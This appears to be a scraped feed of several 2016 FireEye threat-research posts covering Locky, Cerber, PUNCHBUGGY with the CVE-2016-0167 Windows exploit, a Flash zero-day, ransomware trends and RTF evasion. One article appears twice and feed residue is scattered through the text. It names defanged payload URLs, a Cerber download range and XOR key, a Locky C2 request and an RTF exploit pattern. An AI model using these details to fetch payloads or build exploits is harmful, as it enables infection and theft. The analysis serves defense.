Beginning in Android 4.4 (“KitKat”), devices utilize Security Enhancements for Android™ (SEAndroid) and set enforcing mode by default. Devices running SEAndroid in this mode are not impacted as significantly as older devices. The “netd” context that the “/system/bin/radish” executable runs as does not have the ability to interact with other “radio” user application data, has limited filesystem write capabilities and is typically limited in terms of application interactions. The “netd” context does have the ability to alter “system_prop” properties of the Android property subsystem, which includes the “service.”, “persist.sys.”, “persist.service.”, and “persist.security.” property keys. Depending on how a particular device manufacture utilizes these properties, it is possible to further compromise a device by altering these properties.

Conclusions

CVE-2016-2060 has been present on devices since at least 2011 and likely affects hundreds of Android models around the world. This vulnerability allows a seemingly benign application to access sensitive user data including SMS and call history and the ability to perform potentially sensitive actions such as changing system settings or disabling the lock screen. Devices running Android 4.3 (“Jellybean MR2”) or older are the most affected by the vulnerability, and are likely to remain unpatched. Newer devices utilizing SEAndroid are still affected, but to a lesser extent.

FireEye would like to thank Qualcomm for both working diligently to address CVE-2016-2060 and for supporting the release of this blog post. For FireEye Mobile Threat Prevention (MTP) customers, FireEye has added detection of CVE-2016-2060 exploitation on devices as of writing this blog post.

Locky Gets Clever!

$
0
0

As discussed in an earlier FireEye blog, we have seen Locky ransomware rise to fame in recent months. Locky is aggressively distributed via a JavaScript-based downloader sent as an attachment in spam emails, and may have overshadowed the Dridex banking Trojan as the top spam contributor.

FireEye Labs recently observed a new development in the way this ransomware communicates with its control server.  Recent samples of Locky are once again being delivered via “Invoice”-related email campaigns, as seen in Figure 1. When the user runs the attached JavaScript, the JavaScript will attempt to download and execute the Locky ransomware payload from hxxp:// banketcentr.ru/v8usja.

Figure 1. Locky email campaigns

This new Locky variant was observed to be highly evasive in its network communication. It uses both symmetric and asymmetric encryption – unlike previous versions that use custom encoding – to communicate with its control server.

Technical Details of Encryption Mechanism

To start encrypting the victim files, Locky obtains a public key from the control server. The POST data before encryption appears as:

‘id=0FFB4B18DB56F448&act=getkey&affid=1&lang=en&corp=0&serv=0&os=Windows+7&sp=1&x64=1'

To encrypt the request, Locky performs the following actions:

PHASE 1: Generate AES keys and encrypt the plaintext request.

1.     Generate a single random byte using CryptGenRandom() API. This byte decides how many NULL bytes are added to the plaintext request before encryption.

2.     Generate a random binary blob of size 32, again using the CryptGenRandom() API. These bytes serve a dual purpose, as they are used as the key for both AES encryption and HMAC hash calculation.

3.     Append NULL bytes to the plaintext request depending on the random byte generated in step 1.

4.     Encrypt the (plaintext request + NULL bytes) with AES encryption using the random 32 bytes calculated in step 2 as the key.

PHASE 2: Encrypt the generated AES keys.

5.     Obtain a public key (RSA 1024 bits) from a decoded binary blob embedded inside the binary.

6.     Create a PUBLICKEYSTRUCT blob header, add the random  bytes generated in step 2, and then call the CryptImportKey() API to create an RC2 key HANDLE that is used for HMAC calculation.

7.     Calculate the HMAC of (plaintext request + NULL bytes) using the key generated in step 6.

8.     Using the RSA public key from step 5, encrypt  (32-byte AES key [step 2] + random byte [step 1] + HMAC [step 7])

9.     Combine the data from step 4 and step 8 and send it through the POST request. See Figure 2 for an example of the POST request and Figure 3 for the format of the encrypted POST data.

Figure 2. Example POST request

Figure 3. POST data encryption overview

Interestingly, this Locky variant uses the AES-NI extended instruction set – as opposed to software implementation – to generate the encryption round keys and encrypt the text.

AES Round Keys Generation

Locky uses the opcode instruction aeskeygenassist for AES round key generation, as seen in Figure 4.

Figure 4.  AES encryption using AES ENC and AES ENC LAST hardware instructions

AES Encryption Rounds

A total of 14 encryption rounds are used to encrypt the plaintext, which amounts to the use of a 256 bit key. Each round is carried by aesenc instruction and the last round is done by aesenclast, as seen in Figure 5.

Figure 5.  AES round keys generation from primary key            

Conclusion

Crimeware authors are constantly improving their malware. In this case, we see them evolving to protect their malware while maximizing its infection potential. Locky has moved from using simple encoding to obfuscate its network traffic to a complex encryption algorithm using hardware instructions that are very hard to crack.

These types of advancements highlight the importance of remaining vigilant against suspicious emails and using advanced technologies to prevent infections.

IoCs

MD5s:

  • Zip downloader 638f70d173f10b2e8c9313fe20d6a440
  • Locky e4c51f20d07fc010a425e392d2acae16

Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks

$
0
0

In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY.

PUNCHBUGGY is a dynamic-link library (DLL) downloader, existing in both 32-bit and 64-bit versions, that can obtain additional code over HTTPS. This downloader was used by the threat actor to interact with compromised systems and move laterally across victim environments.

FireEye identified more than 100 organizations in North America that fell victim to this campaign. FireEye investigated a number of these breaches and observed that the threat actor had access to relatively sophisticated tools including a previously unknown elevation of privilege (EoP) exploit and a previously unnamed point of sale (POS) memory scraping tool that we refer to as PUNCHTRACK. 

CVE-2016-0167 – Microsoft Windows Zero-Day Local Privilege Escalation

In some victim environments, the threat actor exploited a previously unknown elevation of privilege (EoP) vulnerability in Microsoft Windows to selectively gain SYSTEM privileges on a limited number of compromised machines (Figure 1).

Figure 1. CVE-2016-0167 Local privilege escalation exploit elevates to system

We coordinated with Microsoft, who patched CVE-2016-0167 on the April 12, 2016, Patch Tuesday (MS16-039). Working together, we were able to observe limited, targeted use of this particular exploit dating back to March 8, 2016.

The Threat Actor

We attribute the use of this EoP to a financially motivated threat actor. In the past year, not only have we observed this group using similar infrastructure and techniques, tactics, and procedures (TTPs), but they are also the only group we have observed to date who uses the downloader PUNCHBUGGY and POS malware PUNCHTRACK. Designed to scrape both Track 1 and Track 2 payment card data, PUNCHTRACK is loaded and executed by a highly obfuscated launcher and is never saved to disk.

This actor has conducted operations on a large scale and at a rapid pace, displaying a level of operational awareness and ability to adapt their operations on the fly. These abilities, combined with targeted usage of an EoP exploit and the reconnaissance required to individually tailor phishing emails to victims, potentially speaks to the threat actors’ operational maturity and sophistication.

Exploitation Details

Win32k!xxxMNDestroyHandler Use-After-Free

CVE-2016-0167 is a local elevation of privilege vulnerability in the win32k Windows Graphics subsystem. An attacker who had already achieved remote code execution (RCE) could exploit this vulnerability to elevate privileges. In the attack from the wild, attackers first achieved RCE with malicious macros in documents attached to spear phishing emails. They then downloaded and ran a CVE-2016-0167 exploit to run subsequent code as SYSTEM.

CVE-2016-0167 is patched as of April 12, 2016, meaning the attacker’s EoP exploit will no longer function on fully updated systems. Microsoft released an additional update (MS16-062) on May 10, 2016, to further improve Windows against similar issues.

Vulnerability Setup

First, the exploit calls CreateWindowEx() to create a main window. It sets the WNDCLASSEX.lpfnWndProc field to a function that we name WndProc. It installs an application-defined hook (that we name MessageHandler) and an event hook (that we name EventHandler) using SetWindowsHookEx() and SetWinEventHook(), respectively.

Next, it creates a timer with IDEvent 0x5678 in SetTimer(). When the timeout occurs, WndProc receives the WM_TIMER message and will invoke TrackPopupMenuEx() to display a shortcut menu. EventHandler will capture the EVENT_SYSTEM_MENUPOPUPSTART event from xxxTrackPopupMenuEx()and post a message to the kernel. In handling the message, the kernel eventually calls the vulnerable function xxxMNDestroyHandler(), which calls the usermode callback MessageHandler. MessageHandler then causes a use-after-free scenario by calling DestroyWindow()

Heap Control

The exploit uses SetSysColors() to perform heap Feng Shui which manipulates the layout of the heap by carefully making heap allocations. In the following snippet, one of the important fields is at address fffff900`c1aaac40, where fffff900`c06a0422 is a window kernel object’s (tagWND) base address plus 0x22:

Memory Corruption

The USE operation occurs at HMAssignmentUnlock()+0x14 as shown below:

Since RDX contains the base address of tagWND plus 0x22, this instruction will add 0xffffffff to the win32k!tagWND.state field, changing its value from 0x07004000 to 0x07003fff. 0x07004000 indicates that the bServerSideWindowProc flag is unset. When the change occurs, it sets the bServerSideWindowProc flag as shown below.

Code Execution

If a window is marked as server-side (bServerSideWindowPro is set), the lpfnWndProc function pointer will be trusted by default and this can be user-mode shellcode. The following backtrace shows the kernel calling the exploit’s shellcode:

The shellcode then steals the System process token to elevate a child cmd.exe process.

Mitigation

FireEye products and services identify this activity as Exploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK within the user interfaces.

The latest Windows updates address CVE-2016-0167, and fully protect systems from exploits targeting CVE-2016-0167.

In addition, effective mitigations exist to prevent social engineering attacks that utilize Office macros. Individual users can disable Office macros in their settings and enterprise administrators can enforce a Group Policy to control macro execution for all Office 2016 users. More details about Office macro attacks and mitigations are available here.

Acknowledgements

Thank you to Elia Florio and the Secure@ staff of Microsoft, and Dimiter Andonov, Erye Hernandez, Nick Richard, and Ryann Winters of FireEye for their collaboration on this issue.

Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks

$
0
0

In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY.

PUNCHBUGGY is a dynamic-link library (DLL) downloader, existing in both 32-bit and 64-bit versions, that can obtain additional code over HTTPS. This downloader was used by the threat actor to interact with compromised systems and move laterally across victim environments.

FireEye identified more than 100 organizations in North America that fell victim to this campaign. FireEye investigated a number of these breaches and observed that the threat actor had access to relatively sophisticated tools including a previously unknown elevation of privilege (EoP) exploit and a previously unnamed point of sale (POS) memory scraping tool that we refer to as PUNCHTRACK. 

CVE-2016-0167 – Microsoft Windows Zero-Day Local Privilege Escalation

In some victim environments, the threat actor exploited a previously unknown elevation of privilege (EoP) vulnerability in Microsoft Windows to selectively gain SYSTEM privileges on a limited number of compromised machines (Figure 1).

Figure 1. CVE-2016-0167 Local privilege escalation exploit elevates to system

We coordinated with Microsoft, who patched CVE-2016-0167 on the April 12, 2016, Patch Tuesday (MS16-039). Working together, we were able to observe limited, targeted use of this particular exploit dating back to March 8, 2016.

The Threat Actor

We attribute the use of this EoP to a financially motivated threat actor. In the past year, not only have we observed this group using similar infrastructure and techniques, tactics, and procedures (TTPs), but they are also the only group we have observed to date who uses the downloader PUNCHBUGGY and POS malware PUNCHTRACK. Designed to scrape both Track 1 and Track 2 payment card data, PUNCHTRACK is loaded and executed by a highly obfuscated launcher and is never saved to disk.

This actor has conducted operations on a large scale and at a rapid pace, displaying a level of operational awareness and ability to adapt their operations on the fly. These abilities, combined with targeted usage of an EoP exploit and the reconnaissance required to individually tailor phishing emails to victims, potentially speaks to the threat actors’ operational maturity and sophistication.

Exploitation Details

Win32k!xxxMNDestroyHandler Use-After-Free

CVE-2016-0167 is a local elevation of privilege vulnerability in the win32k Windows Graphics subsystem. An attacker who had already achieved remote code execution (RCE) could exploit this vulnerability to elevate privileges. In the attack from the wild, attackers first achieved RCE with malicious macros in documents attached to spear phishing emails. They then downloaded and ran a CVE-2016-0167 exploit to run subsequent code as SYSTEM.

CVE-2016-0167 is patched as of April 12, 2016, meaning the attacker’s EoP exploit will no longer function on fully updated systems. Microsoft released an additional update (MS16-062) on May 10, 2016, to further improve Windows against similar issues.

Vulnerability Setup

First, the exploit calls CreateWindowEx() to create a main window. It sets the WNDCLASSEX.lpfnWndProc field to a function that we name WndProc. It installs an application-defined hook (that we name MessageHandler) and an event hook (that we name EventHandler) using SetWindowsHookEx() and SetWinEventHook(), respectively.

Next, it creates a timer with IDEvent 0x5678 in SetTimer(). When the timeout occurs, WndProc receives the WM_TIMER message and will invoke TrackPopupMenuEx() to display a shortcut menu. EventHandler will capture the EVENT_SYSTEM_MENUPOPUPSTART event from xxxTrackPopupMenuEx()and post a message to the kernel. In handling the message, the kernel eventually calls the vulnerable function xxxMNDestroyHandler(), which calls the usermode callback MessageHandler. MessageHandler then causes a use-after-free scenario by calling DestroyWindow()

Heap Control

The exploit uses SetSysColors() to perform heap Feng Shui which manipulates the layout of the heap by carefully making heap allocations. In the following snippet, one of the important fields is at address fffff900`c1aaac40, where fffff900`c06a0422 is a window kernel object’s (tagWND) base address plus 0x22:

Memory Corruption

The USE operation occurs at HMAssignmentUnlock()+0x14 as shown below:

Since RDX contains the base address of tagWND plus 0x22, this instruction will add 0xffffffff to the win32k!tagWND.state field, changing its value from 0x07004000 to 0x07003fff. 0x07004000 indicates that the bServerSideWindowProc flag is unset. When the change occurs, it sets the bServerSideWindowProc flag as shown below.

Code Execution

If a window is marked as server-side (bServerSideWindowPro is set), the lpfnWndProc function pointer will be trusted by default and this can be user-mode shellcode. The following backtrace shows the kernel calling the exploit’s shellcode:

The shellcode then steals the System process token to elevate a child cmd.exe process.

Mitigation

FireEye products and services identify this activity as Exploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK within the user interfaces.

The latest Windows updates address CVE-2016-0167, and fully protect systems from exploits targeting CVE-2016-0167.

In addition, effective mitigations exist to prevent social engineering attacks that utilize Office macros. Individual users can disable Office macros in their settings and enterprise administrators can enforce a Group Policy to control macro execution for all Office 2016 users. More details about Office macro attacks and mitigations are available here.

Acknowledgements

Thank you to Elia Florio and the Secure@ staff of Microsoft, and Dimiter Andonov, Erye Hernandez, Nick Richard, and Ryann Winters of FireEye for their collaboration on this issue.

Cerber Ransomware Partners with the Dridex Spam Distributor

$
0
0

Cerber ransomware incorporates the unusual feature of “speaking” its ransom message after successfully infecting a user machine and encrypting files. Cerber was first seen in the wild at the end of February 2016 and was observed being delivered mostly via exploit kits (EK), notably using Magnitude and Nuclear Pack’s zero-day Flash exploit.

Figure 1 shows that on April 28, 2016, we observed a significant increase in Microsoft Office document-based macro downloader spam campaigns delivering Cerber ransomware as the payload. Since then we observed successor campaigns at the same level of volume. What is more notable about these campaigns is that the same distribution framework used by Dridex seems to be the one delivering this Cerber campaign.

Figure 1. Cerber spam activity trend

Through FireEye’s Dynamic Threat Intelligence (DTI), we observed that one Cerber spam campaign from May 4 was widely spread throughout the world, with the most targets in the United States (see Figure 2).

Figure 2. Geographical distribution of Cerber spam seen by FireEye DTI in May 4

Macro based Downloader

The malicious document attachment contains a macro that drops a VBScript in the %appdata% path of the machine. The rest of the malicious activities are performed by the dropped VBScript. This method of malware delivery is used instead of sending the VBScript directly as an email attachment, since some email gateway policies might block attached scripts.

The dropped VBScript includes obfuscated code that is used to download the Cerber payload.

The following are some of the obfuscation techniques used, briefly summarized:

  1. Declare several variables that are not used in the code. This junk code is added to deter reverse engineering.
  2. A subroutine is used for delaying execution. This subroutine will increment a counter variable from 1 to 96166237. After completing the FOR loop, it compares the value of the variable with 96166237 to ensure that the FOR loop executed completely and there was no short circuit done (see Figure 3). This is done to detect automated analysis systems.

Figure 3. Delay execution routine in VBScript

HTTP Range Request for Internet Connectivity Check

Before downloading the Cerber payload, a check is performed by the VBScript to ensure that the environment has internet connectivity.

As seen in Figure 4, the VBScript sends an HTTP Range Request to a benign website. It looks for the string “Partial Content” in the HTTP response status text, as “206 Partial Content” is the expected response code for an HTTP Range Request according to RFC7233. If the response code is not correct, the VBScript calls a function to enter an infinite loop. In this way, the execution does not complete without Internet connectivity.

Figure 4. HTTP Range Request check for internet connectivity

Cerber Payload Download Method

After the check for internet connectivity is performed, the VBScript sends another HTTP Range Request to fetch a JPEG file from the URL: hxxp://bsprint[.]ro/images/karma-autumn/bg-footer-bottom.jpg?ObIpcVG=

In the HTTP Request Headers, it sets the value of Range Header to: "bytes=11193-". This indicates to the web server to return only the content starting at offset 11,193 of the JPG file.

The response content of this request is XORed with the key: "amfrshakf". Figure 5 shows the code section corresponding to the decryption routine.

Figure 5. Payload decoding routine

This technique of downloading the final payload using an HTTP Range Request check has been leveraged in the past by Dridex and Ursnif. We have observed similar obfuscation techniques used in the dropped VBScript as well.

Cerber Ransomware (MD5: 5a2ea6a1d12dcbeb840f5070c7f1e2f8)

There are no significant changes in the behavior of the Cerber payload in this spam campaign when compared to earlier variants. It still uses the ‘.cerber’ file extension name for the encrypted files. In this particular sample it checks for the country location, local language and whether it is inside a virtual machine environment as per its decrypted configuration, as seen in Figure 6.

Figure 6. Configuration for country location, language and virtual environment checks

This variant is also configured to target email, Word documents, and Steam (gaming) related files. It closes the related processes to have access to possible opened target files.

Figure 7. Configuration for closing processes

The malware asks the victim to visit any of the following websites to pay the ransom and receive further steps to decrypt the encrypted files.

  • hxxp://decrypttozxybarc[.]dconnect[.]eu
  • hxxp://decrypttozxybarc[.]tor2web[.]org
  • hxxp://decrypttozxybarc[.]onion[.]cab
  • hxxp://decrypttozxybarc[.]onion[.]to
  • hxxp://decrypttozxybarc[.]onion[.]link

While examining the decrypted configuration file, we found indications of the possible addition of a spambot module. The malware operator can set options for the email attachment, subject and the email body in the configuration, as seen in Figure 8. In this sample, this feature seems to be in its development or test stage. In order for the malware to be used as a spambot, it would also need a list of email addresses to send the spam email.

Figure 8. Possible spambot related configuration

Conclusion

By partnering with the same spam distributor that has proven its capability by delivering Dridex on a large scale, Cerber is likely to become another serious email threat similar to Dridex and Locky. This is in addition to the fact that Cerber is already known to be delivered through exploit kits. We advise users to be cautious when opening documents and other files from unknown senders, especially when asked to enable macros.

Ransomware authors are constantly upgrading their craft in order to maximize profits. An addition of a spambot module, for example, can add value to their ransomware, since victim machines will also be used as spam email distributors.

Hashes

Spam email

ace933ac89b5cdb6937bf1a43e265d9eb4cb11eead52be2709c4df2194ee3ba0
191db27efb10f96f2fcabcd6d5d759433b687b89a8b6fd90c123fe379b8b98eb
c5aa84c52764f3583e78a62adf8ed8bfda409ff4c8c306a155b82d7da66d0e95
3d0e5ea98fead3c28c6a9f4c6519e6488c4a791e1a40f701bb4fd681163804fe
72ac6b80deaeea9081ebed7edf7c9943813afbbbbbc365e1a781efa04d5765fc
304c21c77b52dce69bddc421b4166627a37068e18296920ac09bbd7cd4962748

Cerber payload

c6f29582e489506ccb14f19fdfa7c16

CVE-2016-4117: Flash Zero-Day Exploited in the Wild

$
0
0

On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in APSB16-15 just four days later.

Attackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.

Attack Summary

Upon opening the document, the exploit downloads and executes a payload from the attacker’s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:

  1. The victim opens the malicious Office document.
    1. The Office document renders an embedded Flash file.
      1. If the Flash Player version is older than 21.0.0.196, the attack aborts.
      2. Otherwise, the attack runs the encoded Flash exploit.
  2. The exploit runs embedded native shellcode.
    1. The shellcode downloads and executes a second shellcode from the attacker’s server.
  3. The second shellcode:
    1. Downloads and executes malware.
    2. Downloads and displays a decoy document.
  4. The malware connects to a second server for command and control (C2) and waits for further instructions.

This process is shown in Figure 1.

Figure 1 Attack flow chart

CVE-2016-4117 Exploitation Details

An out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose “placement” as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the “placement” property conflicts with the “placement” interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.

Figure 2 Placement interface vs. class definition

Memory layout

Before triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3).  



Figure 3 Prepare heap memory layout

These objects look as follows when in memory:

The exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.

Figure 4 Finding target ByteArray

With the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).

Figure 5 RW primitive and execute shellcode

Code execution

Once the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker’s server, which then downloads and executes the malware payload and displays the decoy document.

Conclusion

CVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.


Ransomware Activity Spikes in March, Steadily increasing throughout 2016

$
0
0

Cyber extortion for financial gain is typically carried out in one of two ways. The first method is a business disruption attack – a category we discussed at length in M-Trends 2016. In this type of attack, threat actors target an organization’s critical business systems, capture confidential data and threaten to do something malicious with that data (such as expose, delete, or encrypt it) unless a ransom is paid. This method is generally more targeted, requires a greater deal of finesse on the part of the threat actors, and often has a greater potential payout.

Ransomware is the other common method of cyber extortion for financial gain. Ransomware is a type of malware that prevents users from interacting with their files, applications or systems until a ransom is paid, typically in the form of an anonymous currency such as Bitcoin. While individual computer and mobile device users have long been targets of ransomware, the threat has expanded. Ransomware has gained publicity in recent months through mainstream media coverage of ransomware attacks against organizations, namely hospitals.

While the end goal is the same – some type of financial payout to the attacker – not all ransomware operates the same way. The file-encrypting variety is perhaps the most dangerous. This is because the targeted files, which often contain users’ or organizations’ most valuable data, become useless without the decryption key. The issue is compounded because paying the ransom offers no guarantee that the files will be unlocked, thus making frequent backups the best defense against ransomware.

Since the average ransom demanded from an individual user is relatively low (typically a few hundred dollars, if that), threat actors distributing ransomware typically follow the “spray and pray” tactic of sending out as many lures as possible – emails with malicious attachments or links to malicious websites, for example – to maximize their potential gains.

Ransomware Spike in March

Based on data from FireEye Dynamic Threat Intelligence, ransomware activity has been rising fairly steadily since mid-2015. We observed a noticeable spike in March 2016. Figure 1 depicts the percentage of ransomware compared to all malware detected on FireEye products from October 2015 to March 2016.

Figure 1: Ransomware detections from August 2015 to March 2016

The spike is noteworthy, and consistent with other observations. In March 2016, FireEye Labs detected a significant rise in Locky ransomware downloaders due to an email spam campaign targeting users in more than 50 countries. The malicious email attachments pretended to contain an invoice or a picture, but opening the attachment led to an infection instead.

Ransomware in the Media

There is no denying the satisfaction an attacker feels when their exploits make the news. For threat actors distributing ransomware, the satisfaction is even greater when the headlines report that the victim paid the ransom. A recent blitz of ransomware reports in the media – as well as the follow-up success stories – may have spurred other attackers to get in on the action, possibly resulting in the March ransomware activity spike. The Petya ransomware, for instance, includes links to recent media articles on its ransom payment page, as shown in Figure 1.

Figure 2: FireEye Threat Intelligence in 2016 uncovered Petya ransomware advertising links to recent media articles on their ransomware payment page

Hollywood Presbyterian Medical Center incident

In early February, Hollywood Presbyterian Medical Center (HPMC) was in the media spotlight after their systems became infected with file-encrypting ransomware. Midway through the month, Allen Stefanek, president and CEO, wrote that staff had trouble accessing the network beginning Feb. 5. He explained that malware locked access to certain computer systems and prevented the sharing of communications electronically, and indicated that a ransom of 40 Bitcoins had been requested (approximately $17,000 at the time).

“The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key,” Stefanek wrote. “In the best interest of restoring normal operations, we did this.” HPMC restored its electronic medical record system and cleared all systems of the malware by Feb. 15.

Continued targeting of hospitals

Attackers may have taken a hint that hospitals are a lucrative target. Later in February, The Register reported that file-encrypting ransomware infected the systems of Lukas Hospital and Klinikum Arnsberg hospital – both in Germany. Then in March, Ars Technica reported that data at Union Memorial Hospital in Maryland – as well as other MedStar hospitals in the Washington, DC area – were encrypted by ransomware, and that the requested ransom was 45 Bitcoins, or about $18,500 at the time.

The targeting of hospitals is no surprise. Cyber criminals have been increasingly turning to industries such as healthcare that possess critical data but may have limited investment in security across their enterprise. With hospitals, budget dollars often go towards surgery wards, emergency care centers and supplies for a large number of patients – not security. This makes for a tricky issue, since hospitals cannot operate without the necessary patient data stored in their systems.

Other Factors Influencing Uptick in Ransomware Activity

High-profile media coverage of ransomware is certainly attracting attackers, but that is not the only factor driving the uptick in activity. The following are some additional factors contributing to the increase:

  • Relatively high profit margins coupled with the relatively low overhead required to operate a ransomware campaign have bolstered the appeal of this particular attack type, fueling market demand for tools and services corresponding to its propagation. For example, in 2015 we observed a small-scale ransomware operation that nevertheless likely netted the perpetrators about $75,000.
  • The success of prolific ransomware families such as CryptoWall has provided a blueprint for aspiring ransomware developers, showcasing increasing profit margins and campaign sustainability. According to the FBI's Internet Crime Complaint Center (IC3), CryptoWall generated identified victim losses totaling more than $18 million between April 2014 and June 2015.
  • The emergence of several new ransomware variants adopting a ransomware as a Service (RaaS) framework since mid-2015, a phenomenon likely driven by the competitive development of quality goods and services within the cyber crime ecosystem. Based on multiple factors, RaaS offerings – which are uniquely poised to capitalize on current underground marketplace demand for ransomware – are highly likely to fuel an increasing number of ransomware infections.
Ransomware Variants

Through this discernible uptick in ransomware activity from mid-2015 to early 2016, FireEye has observed significant growth and maturation of the ransomware threat landscape – predominately involving the proliferation of myriad new variants.

Prolific Ransomware Families

We continue to observe the sustained distribution of multiple, well-established ransomware families used in both geographically targeted and mass infection campaigns. In multiple cases these renowned variants, such as CryptoWall and TorrentLocker, spawned updated variants with improvements in either encryption capabilities or obfuscation techniques. These established ransomware brands will continue to pose a significant threat to global enterprises, as malware functionality, encryption techniques and counter-mitigation measures are adapted and successfully introduced into updated variants. Examples include:

  • TorrentLocker: Throughout 2015, FireEye observed continued distribution of TorrentLocker, a ransomware family based on both CryptoLocker and CryptoWall. According to multiple open-source reports, TorrentLocker has been active since at least early 2014 and is most often distributed in geographically-specific spam campaigns.
  • CTB-Locker: CTB-Locker – a name that represents the key elements of the ransomware, namely Curve (for Elliptic Curve Cryptography), Tor and Bitcoin – was first seen around mid-2014 and remained active throughout 2015. During this reporting period, we observed multiple campaigns propagating CTB-Locker and its variants, including CTB-Locker distributors capitalizing on Windows 10 releases and free upgrades by sending out spam campaigns citing Windows 10 upgrades in mid-2015.

Novel Ransomware Variants

We have also observed several new ransomware variants that incorporate a range of new tactics, techniques and procedures (of varying degrees of technical practicality). Based on the increased growth in this area, we expect ransomware developers to continue equipping ransomware variants with novel features in order to expand targeted platforms and increase conversion ratios.

  • Chimera: The operators behind the  Chimera ransomware not only used the malware to encrypt victims’ files, but further threatened to publish the encrypted data if victims failed to pay the ransom. The threat actors began targeting German-based small and medium-sized business enterprises around mid-September 2015.
  • Ransom32: Ransom32, first publicly reported in late December 2015, is purportedly one of the first ransomware variants based entirely on JavaScript, potentially allowing for cross-operating system (OS) compatibility and packaging for both Linux and Mac OS.
  • LowLevel04: According to open-source reporting, operators of LowLevel04 purportedly spread the ransomware using the unconventional infection mechanism of exploiting Remote Desktop and Terminal Services.
  • Linux.Encoder.1: According to open-source reporting, Linux.Encoder.1 debuted in late 2015 as one of the first ransomware variants targeting Linux web-based servers. While the encryption capabilities of the earliest variants proved to be suspect – with multiple reports alleging faults in its predictable encryption key – the targeting associated with this malware family represents a deviation from more traditional Windows-based attacks.
Outlook and Implications

We expected to see the ransomware threat landscape sustain, if not exceed, levels observed in 2015 – and so far we have been right. Cyber extortion has gained significant notoriety, with illicit profits garnered from highly publicized campaigns undoubtedly resonating among cyber criminals. Recent campaigns in which targeted victims paid the ransom demand reinforce the legitimacy and popularity of this particular attack method.

One of the most worrying threats concerns the targeted deployment of ransomware after the attackers have already gained a foothold in the network. In these cases, threat actors may be able to conduct reconnaissance to strategically disable or delete backups and identify those systems most critical to an organization’s operations before deploying the ransomware. To increase the difficulty of such an attack, enterprises are encouraged to properly segment networks and implement access controls. In addition, enterprises should evaluate backup strategies regularly and test those backups to ensure that recovery is successful. Finally, copies of backups should be stored offsite in case onsite backups are targeted.

Learn more about ransomware during our webinar on May 19, 2016, at 11:00am EDT. You can register here.

 

How RTF malware evades static signature-based detection

$
0
0

History

Rich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as CVE-2010-3333 and CVE-2014-1761 were caused by errors in implementing RTF parsing logic.

In fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. CVE-2012-0158 and CVE-2015-1641 are two typical examples of such vulnerabilities – their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.

Another type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.

Plenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.

In this blog, we present some common evasive tricks used by malicious RTFs.

Common obfuscations

Let’s discuss a couple different RTF obfuscation strategies.

1.     CVE-2010-3333

This vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability targeted an Ambassador of India.

The root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.

The Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:

{rtf1{shp{sp{sn pFragments}{sv A;B;[word1][word2][word3][hex value array]}}}}

